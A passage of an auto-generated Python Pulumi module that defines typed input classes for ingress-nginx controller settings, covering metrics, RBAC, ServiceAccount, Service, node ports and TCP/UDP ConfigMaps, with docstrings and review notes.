    def external_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        return pulumi.get(self, "external_ips")
    @external_ips.setter
    def external_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "external_ips", value)
    @property
    @pulumi.getter(name="externalTrafficPolicy")
    def external_traffic_policy(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "external_traffic_policy")
    @external_traffic_policy.setter
    def external_traffic_policy(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "external_traffic_policy", value)
    @property
    @pulumi.getter(name="loadBalancerIPs")
    def load_balancer_ips(self) -> Optional[pulumi.Input[str]]:
        """Load-balancer IP — plural name but single ``str`` as emitted by the generator."""
        return pulumi.get(self, "load_balancer_ips")
    @load_balancer_ips.setter
    def load_balancer_ips(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "load_balancer_ips", value)
    @property
    @pulumi.getter(name="loadBalancerSourceRanges")
    def load_balancer_source_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        return pulumi.get(self, "load_balancer_source_ranges")
    @load_balancer_source_ranges.setter
    def load_balancer_source_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "load_balancer_source_ranges", value)
    @property
    @pulumi.getter(name="nodePort")
    def node_port(self) -> Optional[pulumi.Input[str]]:
        """Node port — typed ``str`` by the generator even though Kubernetes
        node ports are numeric; TODO confirm against the chart schema."""
        return pulumi.get(self, "node_port")
    @node_port.setter
    def node_port(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "node_port", value)
    @property
    @pulumi.getter(name="servicePort")
    def service_port(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "service_port")
    @service_port.setter
    def service_port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "service_port", value)
    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """Kubernetes Service type (e.g. ClusterIP/NodePort/LoadBalancer — not validated here)."""
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class ControllerMetricsArgs:
    """Input properties for controller metrics (port, Service, ServiceMonitor,
    PrometheusRule).

    NOTE(review): auto-generated Pulumi input type — presumably mirrors the
    ingress-nginx chart's ``controller.metrics`` values block; regenerate
    rather than hand-editing the structure.
    """
    def __init__(__self__, *,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 port: Optional[pulumi.Input[int]] = None,
                 prometheus_rule: Optional[pulumi.Input['ControllerMetricsPrometheusRulesArgs']] = None,
                 service: Optional[pulumi.Input['ControllerMetricsServiceArgs']] = None,
                 service_monitor: Optional[pulumi.Input['ControllerMetricsServiceMonitorArgs']] = None):
        """
        :param pulumi.Input[int] port: if this port is changed, change healthz-port: in extraArgs: accordingly.
        """
        # Only record values the caller actually supplied; unset keys stay absent.
        if enabled is not None:
            pulumi.set(__self__, "enabled", enabled)
        if port is not None:
            pulumi.set(__self__, "port", port)
        if prometheus_rule is not None:
            pulumi.set(__self__, "prometheus_rule", prometheus_rule)
        if service is not None:
            pulumi.set(__self__, "service", service)
        if service_monitor is not None:
            pulumi.set(__self__, "service_monitor", service_monitor)
    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """Whether metrics are enabled."""
        return pulumi.get(self, "enabled")
    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
    @property
    @pulumi.getter
    def port(self) -> Optional[pulumi.Input[int]]:
        """
        if this port is changed, change healthz-port: in extraArgs: accordingly.
        """
        return pulumi.get(self, "port")
    @port.setter
    def port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "port", value)
    @property
    @pulumi.getter(name="prometheusRule")
    def prometheus_rule(self) -> Optional[pulumi.Input['ControllerMetricsPrometheusRulesArgs']]:
        """Nested PrometheusRule configuration."""
        return pulumi.get(self, "prometheus_rule")
    @prometheus_rule.setter
    def prometheus_rule(self, value: Optional[pulumi.Input['ControllerMetricsPrometheusRulesArgs']]):
        pulumi.set(self, "prometheus_rule", value)
    @property
    @pulumi.getter
    def service(self) -> Optional[pulumi.Input['ControllerMetricsServiceArgs']]:
        """Nested metrics Service configuration."""
        return pulumi.get(self, "service")
    @service.setter
    def service(self, value: Optional[pulumi.Input['ControllerMetricsServiceArgs']]):
        pulumi.set(self, "service", value)
    @property
    @pulumi.getter(name="serviceMonitor")
    def service_monitor(self) -> Optional[pulumi.Input['ControllerMetricsServiceMonitorArgs']]:
        """Nested ServiceMonitor configuration."""
        return pulumi.get(self, "service_monitor")
    @service_monitor.setter
    def service_monitor(self, value: Optional[pulumi.Input['ControllerMetricsServiceMonitorArgs']]):
        pulumi.set(self, "service_monitor", value)
@pulumi.input_type
class ControllerPodSecurityPolicyArgs:
    """Single-flag input type: whether a PodSecurityPolicy is enabled.

    NOTE(review): auto-generated Pulumi input type; regenerate rather than
    hand-editing the structure.
    """
    def __init__(__self__, *,
                 enabled: Optional[pulumi.Input[bool]] = None):
        # Only record the value if explicitly supplied.
        if enabled is not None:
            pulumi.set(__self__, "enabled", enabled)
    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """Whether the PodSecurityPolicy is enabled."""
        return pulumi.get(self, "enabled")
    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
@pulumi.input_type
class ControllerPortArgs:
    """HTTP/HTTPS port-number pair, reused for container ports, service ports
    and target ports.

    NOTE(review): auto-generated Pulumi input type; regenerate rather than
    hand-editing the structure.
    """
    def __init__(__self__, *,
                 http: Optional[pulumi.Input[int]] = None,
                 https: Optional[pulumi.Input[int]] = None):
        # Only record values the caller actually supplied; unset keys stay absent.
        if http is not None:
            pulumi.set(__self__, "http", http)
        if https is not None:
            pulumi.set(__self__, "https", https)
    @property
    @pulumi.getter
    def http(self) -> Optional[pulumi.Input[int]]:
        """HTTP port number."""
        return pulumi.get(self, "http")
    @http.setter
    def http(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "http", value)
    @property
    @pulumi.getter
    def https(self) -> Optional[pulumi.Input[int]]:
        """HTTPS port number."""
        return pulumi.get(self, "https")
    @https.setter
    def https(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "https", value)
@pulumi.input_type
class ControllerPublishServiceArgs:
    """Input properties for the controller's publish-service setting.

    NOTE(review): auto-generated Pulumi input type; regenerate rather than
    hand-editing the structure.
    """
    def __init__(__self__, *,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 path_override: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] path_override: Allows overriding of the publish service to bind to. Must be <namespace>/<service_name>.
        """
        # Only record values the caller actually supplied; unset keys stay absent.
        if enabled is not None:
            pulumi.set(__self__, "enabled", enabled)
        if path_override is not None:
            pulumi.set(__self__, "path_override", path_override)
    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """Whether the publish service is enabled."""
        return pulumi.get(self, "enabled")
    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
    @property
    @pulumi.getter(name="pathOverride")
    def path_override(self) -> Optional[pulumi.Input[str]]:
        """
        Allows overriding of the publish service to bind to. Must be <namespace>/<service_name>.
        """
        return pulumi.get(self, "path_override")
    @path_override.setter
    def path_override(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "path_override", value)
@pulumi.input_type
class ControllerRBACArgs:
    """RBAC settings: whether to create RBAC resources and whether they are
    namespace-scoped.

    NOTE(review): auto-generated Pulumi input type; regenerate rather than
    hand-editing the structure.
    """
    def __init__(__self__, *,
                 create: Optional[pulumi.Input[bool]] = None,
                 scope: Optional[pulumi.Input[bool]] = None):
        # Only record values the caller actually supplied; unset keys stay absent.
        if create is not None:
            pulumi.set(__self__, "create", create)
        if scope is not None:
            pulumi.set(__self__, "scope", scope)
    @property
    @pulumi.getter
    def create(self) -> Optional[pulumi.Input[bool]]:
        """Whether to create RBAC resources."""
        return pulumi.get(self, "create")
    @create.setter
    def create(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "create", value)
    @property
    @pulumi.getter
    def scope(self) -> Optional[pulumi.Input[bool]]:
        """Presumably restricts RBAC to namespace scope (Role vs ClusterRole) — confirm against the chart."""
        return pulumi.get(self, "scope")
    @scope.setter
    def scope(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "scope", value)
@pulumi.input_type
class ControllerRollingUpdateArgs:
    """Rolling-update strategy parameters (currently only ``maxUnavailable``).

    NOTE(review): auto-generated Pulumi input type; regenerate rather than
    hand-editing the structure.
    """
    def __init__(__self__, *,
                 max_unavailable: Optional[pulumi.Input[int]] = None):
        # Only record the value if explicitly supplied.
        if max_unavailable is not None:
            pulumi.set(__self__, "max_unavailable", max_unavailable)
    @property
    @pulumi.getter(name="maxUnavailable")
    def max_unavailable(self) -> Optional[pulumi.Input[int]]:
        """Maximum number of pods unavailable during a rolling update."""
        return pulumi.get(self, "max_unavailable")
    @max_unavailable.setter
    def max_unavailable(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "max_unavailable", value)
@pulumi.input_type
class ControllerScopeArgs:
    """Controller scoping: enable flag plus the namespace to watch.

    NOTE(review): auto-generated Pulumi input type; regenerate rather than
    hand-editing the structure.
    """
    def __init__(__self__, *,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 namespace: Optional[pulumi.Input[str]] = None):
        # Only record values the caller actually supplied; unset keys stay absent.
        if enabled is not None:
            pulumi.set(__self__, "enabled", enabled)
        if namespace is not None:
            pulumi.set(__self__, "namespace", namespace)
    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """Whether namespace scoping is enabled."""
        return pulumi.get(self, "enabled")
    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
    @property
    @pulumi.getter
    def namespace(self) -> Optional[pulumi.Input[str]]:
        """Namespace the controller is scoped to."""
        return pulumi.get(self, "namespace")
    @namespace.setter
    def namespace(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "namespace", value)
@pulumi.input_type
class ControllerServiceAccountArgs:
    """ServiceAccount settings: creation flag, token automount flag, and an
    explicit name.

    NOTE(review): auto-generated Pulumi input type; regenerate rather than
    hand-editing the structure.
    """
    def __init__(__self__, *,
                 automount_service_account_token: Optional[pulumi.Input[bool]] = None,
                 create: Optional[pulumi.Input[bool]] = None,
                 name: Optional[pulumi.Input[str]] = None):
        # Only record values the caller actually supplied; unset keys stay absent.
        if automount_service_account_token is not None:
            pulumi.set(__self__, "automount_service_account_token", automount_service_account_token)
        if create is not None:
            pulumi.set(__self__, "create", create)
        if name is not None:
            pulumi.set(__self__, "name", name)
    @property
    @pulumi.getter(name="automountServiceAccountToken")
    def automount_service_account_token(self) -> Optional[pulumi.Input[bool]]:
        """Whether the ServiceAccount token is automounted into pods."""
        return pulumi.get(self, "automount_service_account_token")
    @automount_service_account_token.setter
    def automount_service_account_token(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "automount_service_account_token", value)
    @property
    @pulumi.getter
    def create(self) -> Optional[pulumi.Input[bool]]:
        """Whether to create the ServiceAccount."""
        return pulumi.get(self, "create")
    @create.setter
    def create(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "create", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """Explicit ServiceAccount name to use."""
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
@pulumi.input_type
class ControllerServiceInternalArgs:
    """Input properties for the optional internal (additional) load-balancer
    Service.

    NOTE(review): auto-generated Pulumi input type — presumably mirrors the
    ingress-nginx chart's ``controller.service.internal`` values block;
    regenerate rather than hand-editing the structure.
    """
    def __init__(__self__, *,
                 annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 external_traffic_policy: Optional[pulumi.Input[str]] = None,
                 labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
                 load_balancer_ips: Optional[pulumi.Input[str]] = None,
                 load_balancer_source_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
        """
        :param pulumi.Input[str] external_traffic_policy: Set external traffic policy to: "Local" to preserve source IP on providers supporting it. Ref: https://kubernetes.io/docs/tutorials/services/source-ip/#source-ip-for-services-with-typeloadbalancer
        :param pulumi.Input[Sequence[pulumi.Input[str]]] load_balancer_source_ranges: Restrict access For LoadBalancer service. Defaults to 0.0.0.0/0.
        """
        # Only record values the caller actually supplied; unset keys stay absent.
        if annotations is not None:
            pulumi.set(__self__, "annotations", annotations)
        if enabled is not None:
            pulumi.set(__self__, "enabled", enabled)
        if external_traffic_policy is not None:
            pulumi.set(__self__, "external_traffic_policy", external_traffic_policy)
        if labels is not None:
            pulumi.set(__self__, "labels", labels)
        if load_balancer_ips is not None:
            pulumi.set(__self__, "load_balancer_ips", load_balancer_ips)
        if load_balancer_source_ranges is not None:
            pulumi.set(__self__, "load_balancer_source_ranges", load_balancer_source_ranges)
    @property
    @pulumi.getter
    def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
        """Annotations for the internal load balancer (mandatory for it to come up on most clouds)."""
        return pulumi.get(self, "annotations")
    @annotations.setter
    def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
        pulumi.set(self, "annotations", value)
    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """Whether the internal load balancer is enabled."""
        return pulumi.get(self, "enabled")
    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
    @property
    @pulumi.getter(name="externalTrafficPolicy")
    def external_traffic_policy(self) -> Optional[pulumi.Input[str]]:
        """
        Set external traffic policy to: "Local" to preserve source IP on providers supporting it. Ref: https://kubernetes.io/docs/tutorials/services/source-ip/#source-ip-for-services-with-typeloadbalancer
        """
        return pulumi.get(self, "external_traffic_policy")
    @external_traffic_policy.setter
    def external_traffic_policy(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "external_traffic_policy", value)
    @property
    @pulumi.getter
    def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
        """Labels to apply to the internal Service."""
        return pulumi.get(self, "labels")
    @labels.setter
    def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
        pulumi.set(self, "labels", value)
    @property
    @pulumi.getter(name="loadBalancerIPs")
    def load_balancer_ips(self) -> Optional[pulumi.Input[str]]:
        """Load-balancer IP — plural name but single ``str`` as emitted by the generator."""
        return pulumi.get(self, "load_balancer_ips")
    @load_balancer_ips.setter
    def load_balancer_ips(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "load_balancer_ips", value)
    @property
    @pulumi.getter(name="loadBalancerSourceRanges")
    def load_balancer_source_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Restrict access For LoadBalancer service. Defaults to 0.0.0.0/0.
        """
        return pulumi.get(self, "load_balancer_source_ranges")
    @load_balancer_source_ranges.setter
    def load_balancer_source_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "load_balancer_source_ranges", value)
@pulumi.input_type
class ControllerServiceNodePortsArgs:
    """Node-port assignments for the controller Service: HTTP, HTTPS, and
    free-form TCP/UDP maps.

    NOTE(review): auto-generated Pulumi input type; regenerate rather than
    hand-editing the structure. ``http``/``https`` are typed ``str`` by the
    generator even though node ports are numeric — TODO confirm.
    """
    def __init__(__self__, *,
                 http: Optional[pulumi.Input[str]] = None,
                 https: Optional[pulumi.Input[str]] = None,
                 tcp: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
                 udp: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None):
        # Only record values the caller actually supplied; unset keys stay absent.
        if http is not None:
            pulumi.set(__self__, "http", http)
        if https is not None:
            pulumi.set(__self__, "https", https)
        if tcp is not None:
            pulumi.set(__self__, "tcp", tcp)
        if udp is not None:
            pulumi.set(__self__, "udp", udp)
    @property
    @pulumi.getter
    def http(self) -> Optional[pulumi.Input[str]]:
        """Node port for HTTP."""
        return pulumi.get(self, "http")
    @http.setter
    def http(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "http", value)
    @property
    @pulumi.getter
    def https(self) -> Optional[pulumi.Input[str]]:
        """Node port for HTTPS."""
        return pulumi.get(self, "https")
    @https.setter
    def https(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "https", value)
    @property
    @pulumi.getter
    def tcp(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
        """Node ports for additional TCP services (free-form mapping)."""
        return pulumi.get(self, "tcp")
    @tcp.setter
    def tcp(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
        pulumi.set(self, "tcp", value)
    @property
    @pulumi.getter
    def udp(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
        """Node ports for additional UDP services (free-form mapping)."""
        return pulumi.get(self, "udp")
    @udp.setter
    def udp(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
        pulumi.set(self, "udp", value)
@pulumi.input_type
class ControllerServiceArgs:
    """Input properties for the main controller Service (the externally
    reachable load balancer).

    NOTE(review): auto-generated Pulumi input type — presumably mirrors the
    ingress-nginx chart's ``controller.service`` values block; regenerate
    rather than hand-editing the structure. All fields are optional; only
    explicitly supplied values are stored.
    """
    def __init__(__self__, *,
                 annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
                 cluster_ip: Optional[pulumi.Input[str]] = None,
                 enable_http: Optional[pulumi.Input[bool]] = None,
                 enable_https: Optional[pulumi.Input[bool]] = None,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 external_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 external_traffic_policy: Optional[pulumi.Input[str]] = None,
                 health_check_node_port: Optional[pulumi.Input[int]] = None,
                 internal: Optional[pulumi.Input['ControllerServiceInternalArgs']] = None,
                 labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
                 load_balancer_ips: Optional[pulumi.Input[str]] = None,
                 load_balancer_source_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 node_ports: Optional[pulumi.Input['ControllerServiceNodePortsArgs']] = None,
                 ports: Optional[pulumi.Input['ControllerPortArgs']] = None,
                 session_affinity: Optional[pulumi.Input[str]] = None,
                 target_ports: Optional[pulumi.Input['ControllerPortArgs']] = None,
                 type: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[Sequence[pulumi.Input[str]]] external_ips: List of IP addresses at which the controller services are available Ref: https://kubernetes.io/docs/user-guide/services/#external-ips
        :param pulumi.Input[str] external_traffic_policy: Set external traffic policy to: "Local" to preserve source IP on providers supporting it. Ref: https://kubernetes.io/docs/tutorials/services/source-ip/#source-ip-for-services-with-typeloadbalancer
        :param pulumi.Input[int] health_check_node_port: specifies the health check node port (numeric port number) for the service. If healthCheckNodePort isn’t specified, the service controller allocates a port from your cluster’s NodePort range. Ref: https://kubernetes.io/docs/tasks/access-application-cluster/create-external-load-balancer/#preserving-the-client-source-ip
        :param pulumi.Input['ControllerServiceInternalArgs'] internal: Enables an additional internal load balancer (besides the external one). Annotations are mandatory for the load balancer to come up. Varies with the cloud service.
        :param pulumi.Input[str] session_affinity: Must be either "None" or "ClientIP" if set. Kubernetes will default to "None". Ref: https://kubernetes.io/docs/concepts/services-networking/service/#virtual-ips-and-service-proxies
        """
        # Only record values the caller actually supplied; unset keys stay absent.
        if annotations is not None:
            pulumi.set(__self__, "annotations", annotations)
        if cluster_ip is not None:
            pulumi.set(__self__, "cluster_ip", cluster_ip)
        if enable_http is not None:
            pulumi.set(__self__, "enable_http", enable_http)
        if enable_https is not None:
            pulumi.set(__self__, "enable_https", enable_https)
        if enabled is not None:
            pulumi.set(__self__, "enabled", enabled)
        if external_ips is not None:
            pulumi.set(__self__, "external_ips", external_ips)
        if external_traffic_policy is not None:
            pulumi.set(__self__, "external_traffic_policy", external_traffic_policy)
        if health_check_node_port is not None:
            pulumi.set(__self__, "health_check_node_port", health_check_node_port)
        if internal is not None:
            pulumi.set(__self__, "internal", internal)
        if labels is not None:
            pulumi.set(__self__, "labels", labels)
        if load_balancer_ips is not None:
            pulumi.set(__self__, "load_balancer_ips", load_balancer_ips)
        if load_balancer_source_ranges is not None:
            pulumi.set(__self__, "load_balancer_source_ranges", load_balancer_source_ranges)
        if node_ports is not None:
            pulumi.set(__self__, "node_ports", node_ports)
        if ports is not None:
            pulumi.set(__self__, "ports", ports)
        if session_affinity is not None:
            pulumi.set(__self__, "session_affinity", session_affinity)
        if target_ports is not None:
            pulumi.set(__self__, "target_ports", target_ports)
        if type is not None:
            pulumi.set(__self__, "type", type)
    @property
    @pulumi.getter
    def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
        """Annotations to apply to the Service."""
        return pulumi.get(self, "annotations")
    @annotations.setter
    def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
        pulumi.set(self, "annotations", value)
    @property
    @pulumi.getter(name="clusterIP")
    def cluster_ip(self) -> Optional[pulumi.Input[str]]:
        """Explicit cluster IP for the Service (wire name ``clusterIP``)."""
        return pulumi.get(self, "cluster_ip")
    @cluster_ip.setter
    def cluster_ip(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cluster_ip", value)
    @property
    @pulumi.getter(name="enableHttp")
    def enable_http(self) -> Optional[pulumi.Input[bool]]:
        """Whether the HTTP port is exposed."""
        return pulumi.get(self, "enable_http")
    @enable_http.setter
    def enable_http(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enable_http", value)
    @property
    @pulumi.getter(name="enableHttps")
    def enable_https(self) -> Optional[pulumi.Input[bool]]:
        """Whether the HTTPS port is exposed."""
        return pulumi.get(self, "enable_https")
    @enable_https.setter
    def enable_https(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enable_https", value)
    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """Whether the Service is created at all."""
        return pulumi.get(self, "enabled")
    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
    @property
    @pulumi.getter(name="externalIPs")
    def external_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        List of IP addresses at which the controller services are available Ref: https://kubernetes.io/docs/user-guide/services/#external-ips
        """
        return pulumi.get(self, "external_ips")
    @external_ips.setter
    def external_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "external_ips", value)
    @property
    @pulumi.getter(name="externalTrafficPolicy")
    def external_traffic_policy(self) -> Optional[pulumi.Input[str]]:
        """
        Set external traffic policy to: "Local" to preserve source IP on providers supporting it. Ref: https://kubernetes.io/docs/tutorials/services/source-ip/#source-ip-for-services-with-typeloadbalancer
        """
        return pulumi.get(self, "external_traffic_policy")
    @external_traffic_policy.setter
    def external_traffic_policy(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "external_traffic_policy", value)
    @property
    @pulumi.getter(name="healthCheckNodePort")
    def health_check_node_port(self) -> Optional[pulumi.Input[int]]:
        """
        specifies the health check node port (numeric port number) for the service. If healthCheckNodePort isn’t specified, the service controller allocates a port from your cluster’s NodePort range. Ref: https://kubernetes.io/docs/tasks/access-application-cluster/create-external-load-balancer/#preserving-the-client-source-ip
        """
        return pulumi.get(self, "health_check_node_port")
    @health_check_node_port.setter
    def health_check_node_port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "health_check_node_port", value)
    @property
    @pulumi.getter
    def internal(self) -> Optional[pulumi.Input['ControllerServiceInternalArgs']]:
        """
        Enables an additional internal load balancer (besides the external one). Annotations are mandatory for the load balancer to come up. Varies with the cloud service.
        """
        return pulumi.get(self, "internal")
    @internal.setter
    def internal(self, value: Optional[pulumi.Input['ControllerServiceInternalArgs']]):
        pulumi.set(self, "internal", value)
    @property
    @pulumi.getter
    def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
        """Labels to apply to the Service."""
        return pulumi.get(self, "labels")
    @labels.setter
    def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
        pulumi.set(self, "labels", value)
    @property
    @pulumi.getter(name="loadBalancerIPs")
    def load_balancer_ips(self) -> Optional[pulumi.Input[str]]:
        """Load-balancer IP — plural name but single ``str`` as emitted by the generator."""
        return pulumi.get(self, "load_balancer_ips")
    @load_balancer_ips.setter
    def load_balancer_ips(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "load_balancer_ips", value)
    @property
    @pulumi.getter(name="loadBalancerSourceRanges")
    def load_balancer_source_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """CIDR ranges allowed to reach the LoadBalancer service."""
        return pulumi.get(self, "load_balancer_source_ranges")
    @load_balancer_source_ranges.setter
    def load_balancer_source_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "load_balancer_source_ranges", value)
    @property
    @pulumi.getter(name="nodePorts")
    def node_ports(self) -> Optional[pulumi.Input['ControllerServiceNodePortsArgs']]:
        """Nested node-port assignments."""
        return pulumi.get(self, "node_ports")
    @node_ports.setter
    def node_ports(self, value: Optional[pulumi.Input['ControllerServiceNodePortsArgs']]):
        pulumi.set(self, "node_ports", value)
    @property
    @pulumi.getter
    def ports(self) -> Optional[pulumi.Input['ControllerPortArgs']]:
        """Service ports (HTTP/HTTPS pair)."""
        return pulumi.get(self, "ports")
    @ports.setter
    def ports(self, value: Optional[pulumi.Input['ControllerPortArgs']]):
        pulumi.set(self, "ports", value)
    @property
    @pulumi.getter(name="sessionAffinity")
    def session_affinity(self) -> Optional[pulumi.Input[str]]:
        """
        Must be either "None" or "ClientIP" if set. Kubernetes will default to "None". Ref: https://kubernetes.io/docs/concepts/services-networking/service/#virtual-ips-and-service-proxies
        """
        return pulumi.get(self, "session_affinity")
    @session_affinity.setter
    def session_affinity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "session_affinity", value)
    @property
    @pulumi.getter(name="targetPorts")
    def target_ports(self) -> Optional[pulumi.Input['ControllerPortArgs']]:
        """Target ports (HTTP/HTTPS pair) the Service forwards to."""
        return pulumi.get(self, "target_ports")
    @target_ports.setter
    def target_ports(self, value: Optional[pulumi.Input['ControllerPortArgs']]):
        pulumi.set(self, "target_ports", value)
    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """Kubernetes Service type (e.g. ClusterIP/NodePort/LoadBalancer — not validated here)."""
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class ControllerTcpArgs:
    """Input properties for the TCP services ConfigMap.

    NOTE(review): auto-generated Pulumi input type; regenerate rather than
    hand-editing the structure.
    """
    def __init__(__self__, *,
                 annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 config_map_namespace: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] annotations: Annotations to be added to the tcp config configmap.
        """
        # Only record values the caller actually supplied; unset keys stay absent.
        if annotations is not None:
            pulumi.set(__self__, "annotations", annotations)
        if config_map_namespace is not None:
            pulumi.set(__self__, "config_map_namespace", config_map_namespace)
    @property
    @pulumi.getter
    def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Annotations to be added to the tcp config configmap.
        """
        return pulumi.get(self, "annotations")
    @annotations.setter
    def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "annotations", value)
    @property
    @pulumi.getter(name="configMapNamespace")
    def config_map_namespace(self) -> Optional[pulumi.Input[str]]:
        """Namespace the TCP config ConfigMap lives in."""
        return pulumi.get(self, "config_map_namespace")
    @config_map_namespace.setter
    def config_map_namespace(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "config_map_namespace", value)
@pulumi.input_type
class ControllerUdpArgs:
    """Input properties for the UDP services ConfigMap (mirrors ControllerTcpArgs).

    NOTE(review): auto-generated Pulumi input type; regenerate rather than
    hand-editing the structure.
    """
    def __init__(__self__, *,
                 annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 config_map_namespace: Optional[pulumi.Input[str]] = None):
        """
